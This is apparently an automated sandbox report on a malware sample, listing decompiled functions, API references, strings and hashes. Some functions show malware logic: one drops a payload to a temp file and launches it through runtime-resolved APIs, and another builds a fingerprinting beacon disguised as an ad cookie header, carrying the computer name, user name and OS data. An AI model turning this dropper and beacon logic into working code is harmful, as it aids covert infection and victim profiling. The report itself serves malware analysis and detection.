Instruction Fuzzy Hash: 2531A0726083057BE321CBA1DC48EAB7BECEB89741F04092BFA86C2140EF34D9098771

Uniqueness

Uniqueness Score: -1.00%

Function 000D10DD, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 101
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E000D10DD(void* __ecx) {
				long _t19;
				void* _t24;
				intOrPtr _t25;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t35;
				void* _t39;
				signed int _t40;
				intOrPtr _t50;
				void* _t52;
				int _t53;
				void* _t54;
				void* _t55;
				void* _t56;
				void* _t57;

				_t54 = __ecx;
				_t50 =  *((intOrPtr*)(__ecx + 0xe));
				_t39 =  *((intOrPtr*)(__ecx + 0x12)) + __ecx;
				_t19 = GetTempPathA(0x104, _t55 + 0x54);
				wsprintfA(_t55 + 0x6c + _t19, "~%u.%s", GetTickCount(), _t54 + 0x16);
				_t24 = E000D13E1(_t55 + 0x78, _t39, _t50);
				_t56 = _t55 + 0x14;
				if(_t24 == 0) {
					return _t24 + 1;
				}
				_t25 =  *((intOrPtr*)(_t54 + 0xd));
				if(_t25 != 0) {
					if(_t25 != 1) {
						_t40 = 0;
					} else {
						_t29 = GetProcAddress(LoadLibraryA("KERNEL32.DLL"), _t54 + 0x4e);
						if(_t29 == 0) {
							_t52 = 0;
						} else {
							_t52 =  *_t29(_t56 + 0x64);
						}
						if(_t52 != 0) {
							Sleep(0xffffffff);
						}
						_t40 = 0 | _t52 != 0x00000000;
					}
				} else {
					_t53 = 0x44;
					_t40 = 0;
					memset(_t56 + 0x24, 0, _t53);
					_t57 = _t56 + 0xc;
					 *(_t57 + 0x20) = _t53;
					_t35 = GetProcAddress(LoadLibraryA("KERNEL32.DLL"), _t54 + 0x3e);
					if(_t35 != 0) {
						_t40 =  *_t35(_t57 + 0x88, 0, 0, 0, 0, 0, 0, 0, _t57 + 0x24, _t57 + 0x10);
					}
				}
				return _t40;
			}

0x000d10ea
0x000d10f6
0x000d10f9
0x000d10fb
0x000d111a
0x000d1127
0x000d112c
0x000d1131
0x00000000
0x000d1133
0x000d1139
0x000d113e
0x000d1193
0x000d11d1
0x000d1195
0x000d11a5
0x000d11ad
0x000d11ba
0x000d11af
0x000d11b6
0x000d11b6
0x000d11be
0x000d11c2
0x000d11c2
0x000d11cc
0x000d11cc
0x000d1140
0x000d1142
0x000d1144
0x000d114c
0x000d1151
0x000d1154
0x000d1168
0x000d1170
0x000d118d
0x000d118d
0x000d1170
0x00000000

APIs

GetTempPathA.KERNEL32(00000104,?), ref: 000D10FB
GetTickCount.KERNEL32 ref: 000D1107
wsprintfA.USER32 ref: 000D111A

Part of subcall function 000D13E1: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,00000000,?,?,000D246E,00000000), ref: 000D13FC
Part of subcall function 000D13E1: WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 000D1414
Part of subcall function 000D13E1: CloseHandle.KERNEL32(00000000), ref: 000D141D

memset.MSVCRT ref: 000D114C
LoadLibraryA.KERNEL32(KERNEL32.DLL,?), ref: 000D1161
GetProcAddress.KERNEL32(00000000), ref: 000D1168

Strings

KERNEL32.DLL, xrefs: 000D115C, 000D1199
~%u.%s, xrefs: 000D1114

Memory Dump Source

Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d0000_sample4.jbxd

Yara matches

Similarity

API ID: File$AddressCloseCountCreateHandleLibraryLoadPathProcTempTickWritememsetwsprintf
String ID: KERNEL32.DLL$~%u.%s
API String ID: 3970540841-1793030006
Opcode ID: 69d22723148a5e308cc233d300c043f4ca8168699cbd618377e6d4cbcdc6a321
Instruction ID: 379bd23c9da3d4590c692a60bc9b2b4385bde34c77b69f784727a6bb1000b1d9
Opcode Fuzzy Hash: 69d22723148a5e308cc233d300c043f4ca8168699cbd618377e6d4cbcdc6a321
Instruction Fuzzy Hash: FC2195B2605314BBD7609FE4EC88AEB7BACAB48740F00452BFF55D6240EA34D9088770

Uniqueness

Uniqueness Score: -1.00%

Function 000D1FE0, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 78
memoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E000D1FE0(void* __edx, intOrPtr _a12) {
				void* __ecx;
				WCHAR* _t19;
				WCHAR* _t35;
				void* _t41;
				void* _t42;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				intOrPtr _t52;
				intOrPtr _t54;
				WCHAR* _t55;

				_t41 = __edx;
				_t54 =  *0xd3000;
				_t52 =  *0xd3004;
				_t19 = HeapAlloc(GetProcessHeap(), 8, 0x2001);
				_t35 = _t19;
				_t59 = _t35;
				if(_t35 != 0) {
					_t43 = wsprintfW(_t35, L"%s%u", L"Cookie: __gads=", _t52);
					_t44 = _t43 + wsprintfW( &(_t35[_t43]), L"%s%u", ":", _a12);
					_t55 = ":";
					_t45 = _t44 + wsprintfW( &(_t35[_t44]), L"%s%u", _t55, _t54);
					__imp__GetTickCount64(_t42);
					_t46 = _t45 + wsprintfW( &(_t35[_t45]), L"%s%u", _t55, E000D2600(_t23, _t41, 0x3e8, 0));
					_t47 = _t46 + wsprintfW( &(_t35[_t46]), L"%s%u", _t55, E000D1828( &(_t35[_t43])));
					_t48 = _t47 + E000D1C4A( &(_t35[_t47]));
					_t49 = _t48 + E000D1D68( &(_t35[_t48]), _t59);
					E000D1ECF( &(_t35[_t49 + E000D1DD9( &(_t35[_t48 + E000D1D68( &(_t35[_t48]), _t59)]))]));
					return _t35;
				}
				return _t19;
			}

0x000d1fe0
0x000d1fe3
0x000d1fea
0x000d1ffe
0x000d2004
0x000d2006
0x000d2008
0x000d2027
0x000d203a
0x000d203c
0x000d2050
0x000d2052
0x000d2073
0x000d2087
0x000d2094
0x000d209e
0x000d20ad
0x00000000
0x000d20b4
0x000d20b9

APIs

GetProcessHeap.KERNEL32(00000008,00002001,00000004,?,?,811C9DC5,000D213C,00000000), ref: 000D1FF7
HeapAlloc.KERNEL32(00000000,?,?,811C9DC5,000D213C,00000000), ref: 000D1FFE
wsprintfW.USER32 ref: 000D2021
wsprintfW.USER32 ref: 000D2037
wsprintfW.USER32 ref: 000D204B
GetTickCount64.KERNEL32 ref: 000D2052
__aulldiv.LIBCMT ref: 000D2061
wsprintfW.USER32 ref: 000D2071

Part of subcall function 000D1828: LoadLibraryA.KERNEL32(NTDLL.DLL,ZwQuerySystemInformation), ref: 000D184A
Part of subcall function 000D1828: GetProcAddress.KERNEL32(00000000), ref: 000D1851
Part of subcall function 000D1828: GetProcessHeap.KERNEL32(00000008,00000000,?), ref: 000D1880
Part of subcall function 000D1828: HeapReAlloc.KERNEL32(00000000), ref: 000D1883

wsprintfW.USER32 ref: 000D2085

Part of subcall function 000D1C4A: memset.MSVCRT ref: 000D1C67
Part of subcall function 000D1C4A: LoadLibraryA.KERNEL32(NTDLL.DLL,RtlGetVersion,7742C0B0,000D45C0,00000000), ref: 000D1C7D
Part of subcall function 000D1C4A: GetProcAddress.KERNEL32(00000000), ref: 000D1C84
Part of subcall function 000D1C4A: wsprintfW.USER32 ref: 000D1CAD
Part of subcall function 000D1C4A: wsprintfW.USER32 ref: 000D1CBD
Part of subcall function 000D1C4A: wsprintfW.USER32 ref: 000D1CFD
Part of subcall function 000D1C4A: LoadLibraryA.KERNEL32(KERNEL32.DLL,GetNativeSystemInfo), ref: 000D1D1B
Part of subcall function 000D1C4A: GetProcAddress.KERNEL32(00000000), ref: 000D1D22
Part of subcall function 000D1C4A: wsprintfW.USER32 ref: 000D1D56

Part of subcall function 000D1D68: wsprintfW.USER32 ref: 000D1D8F
Part of subcall function 000D1D68: wsprintfW.USER32 ref: 000D1DA6
Part of subcall function 000D1D68: wsprintfW.USER32 ref: 000D1DB8
Part of subcall function 000D1D68: wsprintfW.USER32 ref: 000D1DCA

Part of subcall function 000D1DD9: GetComputerNameExA.KERNEL32(00000000,?,00000000,00000000,7742C0B0,000D45C0,00000000), ref: 000D1DFA
Part of subcall function 000D1DD9: GetUserNameA.ADVAPI32(?,?), ref: 000D1E2D
Part of subcall function 000D1DD9: wsprintfW.USER32 ref: 000D1E74
Part of subcall function 000D1DD9: wsprintfW.USER32 ref: 000D1E98

Part of subcall function 000D1ECF: LoadLibraryA.KERNEL32 ref: 000D1EF2
Part of subcall function 000D1ECF: GetProcAddress.KERNEL32(00000000), ref: 000D1EF9
Part of subcall function 000D1ECF: GetProcessHeap.KERNEL32(00000008,00000001), ref: 000D1F24
Part of subcall function 000D1ECF: HeapAlloc.KERNEL32(00000000), ref: 000D1F27
Part of subcall function 000D1ECF: GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D1F45
Part of subcall function 000D1ECF: HeapFree.KERNEL32(00000000), ref: 000D1F48

Strings

Cookie: __gads=, xrefs: 000D2016
%s%u, xrefs: 000D201B, 000D202E, 000D2042, 000D206B, 000D207F

Memory Dump Source

Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d0000_sample4.jbxd

Yara matches

Similarity

API ID: wsprintf$Heap$AddressLibraryLoadProcProcess$Alloc$Name$ComputerCount64FreeTickUser__aulldivmemset
String ID: %s%u$Cookie: __gads=
API String ID: 2985715639-3007860590
Opcode ID: 8750646e73ea17a18dd846cdb30365f41a0382a1c4a7532b955219e4c17d5392
Instruction ID: 2f46cfc4f845030ecf0dc43cb25a9a9022963b74cb35c4146740a112b7106af2
Opcode Fuzzy Hash: 8750646e73ea17a18dd846cdb30365f41a0382a1c4a7532b955219e4c17d5392
Instruction Fuzzy Hash: 3A11A2729413087BEB10ABF0EC89DE63B9EDB55750B050537FA05A7247FF74AA048AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00151BE1, Relevance: 18.2, APIs: 12, Instructions: 158COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00151BE8
GetObjectW.GDI32(00000028,00000018,?,00000000,?,0014EF83,?,00000000,?,?,00151B80,?,00000000,00000000), ref: 00151C2E
SelectObject.GDI32(?,00000028), ref: 00151C46
SelectObject.GDI32(?,00000000), ref: 00151C82

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Object$Select$H_prolog3
String ID:
API String ID: 288218362-0
Opcode ID: be7cac7121d8ee80f6f5192ab05e76e753fef888523ac7bb5bffb1c242d8cd87
Instruction ID: 63ececd8e06dd756ccfcf34050783e98d719f38424183852eef6a093dde11407
Opcode Fuzzy Hash: be7cac7121d8ee80f6f5192ab05e76e753fef888523ac7bb5bffb1c242d8cd87
Instruction Fuzzy Hash: A7515531810229EFCF16AFE0EC48AEEBB75FF59312F110125F825AA160DB718D55DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0014F3B4, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 214COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0014F3BE
GetObjectW.GDI32(00000000,00000018,?,?,?,?,?,?,?,?,?,?,?,000000D4,00177515,?), ref: 0014F3FC
SelectObject.GDI32(?,00000000), ref: 0014F45E
GetObjectW.GDI32(?,00000054,?), ref: 0014F4A4
SelectObject.GDI32(?,00000000), ref: 0014F559

Strings

(, xrefs: 0014F4EF

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Object$Select$H_prolog3_
String ID: (
API String ID: 1957664054-3887548279
Opcode ID: 8ae921b040155b7d5b35c86e81f49646d8aa745ad92f5b2e121ec0a0e81caa99
Instruction ID: 5b173b33128e406ca6288fbd19f3da4267597f0dddd20fc3dbdb2f9809d256cb
Opcode Fuzzy Hash: 8ae921b040155b7d5b35c86e81f49646d8aa745ad92f5b2e121ec0a0e81caa99
Instruction Fuzzy Hash: D4A1F574900318DFDB65DF64DC84B9ABBB5BF48310F1081A9E94DE7261DB30AA95CF21

Uniqueness

Uniqueness Score: -1.00%

Function 000D2218, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 61
stringCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E000D2218(intOrPtr __edx, char* _a4) {
				int _v4;
				intOrPtr _v8;
				char* _v12;
				char _v16;
				int _t10;
				char* _t18;
				int _t20;
				char* _t21;
				char* _t22;
				char* _t23;
				char* _t24;

				_t24 = _t18;
				_v8 = __edx;
				_t10 = lstrlenA(_t24);
				_t22 = _a4;
				_t20 = _t10;
				_v4 = _t20;
				while(1) {
					_t23 = StrStrIA(_t22, _t24);
					if(_t23 == 0) {
						break;
					}
					_t22 = _t23 + _t20;
					if( *_t22 != 0x2f || _t22[1] != 0x2f) {
						if(_t22[4] != 0x3a && _t22[5] != 0x3a) {
							_t21 = StrStrIA(_t22, _v12);
							if(_t21 == 0) {
								break;
							}
							 *_t21 = 0;
							if(StrChrA(_t22, 0x29) == 0) {
								_push(_t22);
								if( *_t22 != 0x2f) {
									_push("/%S");
								} else {
									_push(0xd4634);
								}
								_t9 =  &_v4; // 0xd4634
								wsprintfW( *_t9, ??);
								return 1;
							}
							_t22 = _t21;
							_t8 =  &_v16; // 0xd230d
							_t20 =  *_t8;
						}
					}
				}
				return 0;
			}

0x000d221d
0x000d221f
0x000d2224
0x000d222a
0x000d222e
0x000d2230
0x000d2234
0x000d223c
0x000d2240
0x00000000
0x00000000
0x000d2242
0x000d2247
0x000d2253
0x000d2266
0x000d226a
0x00000000
0x00000000
0x000d226f
0x000d227a
0x000d2287
0x000d2288
0x000d2291
0x000d228a
0x000d228a
0x000d228a
0x000d2296
0x000d229a
0x00000000
0x000d22a5
0x000d227c
0x000d227e
0x000d227e
0x000d227e
0x000d2253
0x000d2247
0x00000000

APIs

lstrlenA.KERNEL32(url(",?,?,?,url(",url(",000D230D,?,?,?,?,?,?), ref: 000D2224
StrStrIA.SHLWAPI(?,url(",?,url(",url(",000D230D,?,?,?,?,?,?), ref: 000D2236
StrStrIA.SHLWAPI(00000000,?,?,url(",url(",000D230D,?,?,?,?,?,?), ref: 000D2260
StrChrA.SHLWAPI(00000000,00000029,?,url(",url(",000D230D,?,?,?,?,?,?), ref: 000D2272
wsprintfW.USER32 ref: 000D229A

Strings

url(", xrefs: 000D2218, 000D2219, 000D2223, 000D2234
/%S, xrefs: 000D2291
#, xrefs: 000D227E
4F, xrefs: 000D2296

Memory Dump Source

Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d0000_sample4.jbxd

Yara matches

Similarity

API ID: lstrlenwsprintf
String ID: #$/%S$4F$url("
API String ID: 357247895-640128190
Opcode ID: 7c86b4b23efcd4545d1dfabb327db784e5c9bf4e162dcedc6c4b881877d621fb
Instruction ID: 17ab906f204f1c40547af6bda5190974b2ad8305f4cde0de9810feade09b4b0c
Opcode Fuzzy Hash: 7c86b4b23efcd4545d1dfabb327db784e5c9bf4e162dcedc6c4b881877d621fb
Instruction Fuzzy Hash: 2411C47150A3817FE7754B249808637BFD89FA6360F19456FF8C992351D77898008672

Uniqueness

Uniqueness Score: -1.00%

Function 00119FB8, Relevance: 15.1, APIs: 10, Instructions: 91windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00119FBF
__CxxThrowException@8.LIBVCRUNTIME ref: 00119FF7
GetMenuItemCount.USER32(00000001), ref: 0011A006
GetMenuItemCount.USER32(8007000E), ref: 0011A012
GetSubMenu.USER32(8007000E,-00000001), ref: 0011A029
GetMenuItemCount.USER32(00000000), ref: 0011A03C
GetSubMenu.USER32(00000000,00000000), ref: 0011A04D
RemoveMenu.USER32(00000000,00000000,00000400,?,?,?,?,?,?,?,00273C90,00000004,00118B49,8007000E,?,00119841), ref: 0011A067

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Menu$CountItem$Exception@8H_prolog3RemoveThrow
String ID:
API String ID: 642076194-0
Opcode ID: f519159ea6e5f230a1e8c4262c9a9290476184c79051e7be50992786896edf4a
Instruction ID: 4c1100fe8a71a76d82183d5c1b58df83622751d10ae498fe9bcf61194a292e49
Opcode Fuzzy Hash: f519159ea6e5f230a1e8c4262c9a9290476184c79051e7be50992786896edf4a
Instruction Fuzzy Hash: 4A31AE31901209EBCB29AFB8EC4DAEE3FB8FF85350F504139F419E6151EB709A81CA51

Uniqueness

Uniqueness Score: -1.00%

Function 00252020, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 496COMMONLIBRARYCODE

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 002523FD

Strings

f, xrefs: 0025210B
f, xrefs: 0025216D
p, xrefs: 00252112
f, xrefs: 00252127
:, xrefs: 002520E2
p, xrefs: 00252174
p, xrefs: 0025212E

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: __aulldvrm
String ID: :$f$f$f$p$p$p
API String ID: 1302938615-1434680307
Opcode ID: 487a94deeba883f30ee9a560e8eae2b4095759e47f25a5de5233edfcfba01657
Instruction ID: 54b37cedc1cff51bf5352a023306dfa2631af3d5f6413b34cdb9140cc7eab932
Opcode Fuzzy Hash: 487a94deeba883f30ee9a560e8eae2b4095759e47f25a5de5233edfcfba01657
Instruction Fuzzy Hash: 3702DF75A20118EADF308FA5C4447DDB7BAFB12B16FA44255DC15BB2C4D3744EAC8B18

Uniqueness

Uniqueness Score: -1.00%

Function 0025DE68, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlDecodePointer.NTDLL(?), ref: 0025DE81

Strings

exp, xrefs: 0025DF00, 0025DF65
acos, xrefs: 0025DFB7
log, xrefs: 0025DEDE, 0025DEED
log10, xrefs: 0025DEC3, 0025DED2
pow, xrefs: 0025DF1F, 0025DFC9, 0025E016
sqrt, xrefs: 0025DFC0
asin, xrefs: 0025DFAE

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 68dfef7c9fe783e4a4dca80583daf21c15dbd6e79674feb8039ec280d3ef3e0a
Instruction ID: 9afde1dcea31788a9552009531db04c40790c19d6a12402bf2d96c31f0f24542
Opcode Fuzzy Hash: 68dfef7c9fe783e4a4dca80583daf21c15dbd6e79674feb8039ec280d3ef3e0a
Instruction Fuzzy Hash: B051BE7092054FCBCF249F58E84C1BE7BB0FB45306F014045E991ABA68CBB48A3DDB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00120019, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 00120060
SetActiveWindow.USER32(?), ref: 0012006B
SendMessageW.USER32(?,00000112,?,?), ref: 00120085
IsWindow.USER32(?), ref: 0012008C
SetActiveWindow.USER32(?), ref: 00120097
IsWindow.USER32(00000000), ref: 0012009E
SetFocus.USER32(00000000), ref: 001200A9

Strings

u, xrefs: 001200B2

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Window$ActiveFocus$MessageSend
String ID: u
API String ID: 1556911595-4067256894
Opcode ID: 085c2102dbaaf749bece112f6584d199c3d73e229373d13e16d900a5cb59c255
Instruction ID: b96207568b30c9e38cfc717cca08c74807e72aca0f8378e34da4f9cdd1d91eea
Opcode Fuzzy Hash: 085c2102dbaaf749bece112f6584d199c3d73e229373d13e16d900a5cb59c255
Instruction Fuzzy Hash: 75119032901324ABEB276B74FC4C7AA3A65EB5E780B058725F901861A7DB74C8609B54

Uniqueness

Uniqueness Score: -1.00%

Function 00135D40, Relevance: 13.8, APIs: 9, Instructions: 330windowCOMMON

Download Yara Rule

APIs

InflateRect.USER32(?,000000FE,000000FE), ref: 00135E85

Part of subcall function 00136518: __EH_prolog3.LIBCMT ref: 0013651F

InflateRect.USER32(?,000000FF,000000FF), ref: 00135EAE
InflateRect.USER32(?,000000FF,000000FF), ref: 00135ED7
GetNearestPaletteIndex.GDI32(?,?), ref: 00135F00
FillRect.USER32(?,?,?), ref: 00135F22
InflateRect.USER32(?,000000FE,000000FE), ref: 00135F49
FillRect.USER32(?,?,-00000098), ref: 00135FB9
InflateRect.USER32(?,000000FF,000000FF), ref: 00136004
InflateRect.USER32(?,000000FF,000000FF), ref: 001360CC

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Rect$Inflate$Fill$H_prolog3IndexNearestPalette
String ID:
API String ID: 1120616146-0
Opcode ID: fedab2699c92ce9df6379543b48741e9d5a1fcdfc9031e4d1a01f5a8adb741aa
Instruction ID: d00f6e3e1a7b8ea9b00b142ed192364c6eeebafd2d210f474a39b1d1e2db7da8
Opcode Fuzzy Hash: fedab2699c92ce9df6379543b48741e9d5a1fcdfc9031e4d1a01f5a8adb741aa
Instruction Fuzzy Hash: 5CC1A031900219AFCF05EFA4DD45A9EB7BAFF16320F114269F815AB2A1CB71AD15CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00151FEA, Relevance: 13.7, APIs: 9, Instructions: 202COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00151FF4
GetObjectW.GDI32(?,00000018,?,000000A8,00152661,?,00000010,00000038,00151552,?,?,00000000,00000008,0012FBD8,?), ref: 0015201D

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: H_prolog3_Object
String ID:
API String ID: 2214263146-0
Opcode ID: b903899b26efa7316facc4f96d50cf6394027b30112f0c1e2cf772120c6bbeb6
Instruction ID: 2d3c356675091e973326153e791add79c342a7ec419e1985b333c1a5c625e9d4
Opcode Fuzzy Hash: b903899b26efa7316facc4f96d50cf6394027b30112f0c1e2cf772120c6bbeb6
Instruction Fuzzy Hash: 2B813D75E00229CBDB24CFA9CC84AAEBBB5FF99301F108169E919AB351DB309D45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00151610, Relevance: 13.7, APIs: 9, Instructions: 195fileCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0015161A
GetModuleFileNameW.KERNEL32(00000000,?,00000104,000D35C0,00000000,000D9C68,00000000,000D1AE4,00000000,00000028,?,00000A38,00152648,?,00000000,00000038), ref: 001516B1
CreateFileW.KERNEL32(00000028,80000000,00000001,00000000,00000003,00000000,00000000,000D1AE4,00000000,00000028,?,00000A38,00152648,?,00000000,00000038), ref: 00151753
GetFileSize.KERNEL32(00000000,00000000,?,0014EF83,?,00000000,?,?,00151B80,?,00000000,00000000), ref: 00151763
CloseHandle.KERNEL32(00000000,?,0014EF83,?,00000000,?,?,00151B80,?,00000000,00000000), ref: 0015176C

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: File$CloseCreateH_prolog3_HandleModuleNameSize
String ID:
API String ID: 2198494350-0
Opcode ID: 6a13197302a0096983037d53da97ab68f352c5334aaa3aea36c4fa077c1f6564
Instruction ID: 6c9ba2099a2c373feb29826066c94dd753edc867949f6766d3fa6a2bfcba21fe
Opcode Fuzzy Hash: 6a13197302a0096983037d53da97ab68f352c5334aaa3aea36c4fa077c1f6564
Instruction Fuzzy Hash: F361D772500214BACB21AF24DC89FDF777CEF96710F1041A9F965AB181DB709A89CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0011F6AA, Relevance: 13.6, APIs: 9, Instructions: 121windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0011F6B4
SendMessageW.USER32(00000000,00000000,00000000,00000080), ref: 0011F6FA
SendMessageW.USER32(00000000,00000000,00000000,?), ref: 0011F726
ValidateRect.USER32(?,00000000), ref: 0011F735

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: MessageSend$H_prolog3_RectValidate
String ID:
API String ID: 3261311288-0
Opcode ID: 7059600f3a36de2cfd74ad0b22df66d0d877b6356014572d8ebdc7ca52684909
Instruction ID: 5a2409ee751115ce18a1c9b27ae320f398819930c8b7784db672e3ace6935f6d
Opcode Fuzzy Hash: 7059600f3a36de2cfd74ad0b22df66d0d877b6356014572d8ebdc7ca52684909
Instruction Fuzzy Hash: 2D415C71A10619DFCF25AFA0EC95AAEBAB6FF98300F14443EE04A93171DB319951DF20

Uniqueness

Uniqueness Score: -1.00%

Function 0025CB07, Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 320COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0025CB8E

Strings

i%, xrefs: 0025CD4C, 0025CC8C
i%, xrefs: 0025CB11
i%, xrefs: 0025CB1D, 0025CB73, 0025CB8D

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: _strrchr
String ID: i%$i%$i%
API String ID: 3213747228-2370788599
Opcode ID: 573638e945006dd7fead8af1140409bd4de751500fa2625d6b117167ccf43470
Instruction ID: 5fc503a08f1a373378668cb5940c1665aa7882c5c044dbfa8885896184bb4abb
Opcode Fuzzy Hash: 573638e945006dd7fead8af1140409bd4de751500fa2625d6b117167ccf43470
Instruction Fuzzy Hash: 5BB144729213469FDB158F28C8817AEBBF5EF45311F34806ADC45EB241E2348D69CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 001519E0, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 155COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001519E7
GetObjectW.GDI32(00000000,00000018,?), ref: 00151AE2
DeleteObject.GDI32(00000000), ref: 00151AEF

Strings

0, xrefs: 00151BCB
, xrefs: 00151AFA

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Object$DeleteH_prolog3
String ID: $ 0
API String ID: 657949336-2970217694
Opcode ID: 0fb76185650b2552ca7faf60ac7bafc35f735624db93d9a6ddab1b69e152f855
Instruction ID: 20644faa02fdc9f6e4c43b0e280d51a1237e0010b0de721d766d00e220dd2d5c
Opcode Fuzzy Hash: 0fb76185650b2552ca7faf60ac7bafc35f735624db93d9a6ddab1b69e152f855
Instruction Fuzzy Hash: D9516E71901616FFCB16AFA0C944BEEB775FF14305F014529EC36AB191EB709A58CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00177B07, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00177B0E
GetObjectW.GDI32(?,00000018,?,00000048,00152D74,?,000000FF), ref: 00177B28

Strings

, xrefs: 00177B72

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: H_prolog3Object
String ID:
API String ID: 133200376-3916222277
Opcode ID: 61cdb3f6276a2d5501d278ec5a423c449466d7d53b4fe3192c00787c4b984581
Instruction ID: e626e368713213f290936c080d866e99d2a79b5c629654bd33b79cbcb8e347af
Opcode Fuzzy Hash: 61cdb3f6276a2d5501d278ec5a423c449466d7d53b4fe3192c00787c4b984581
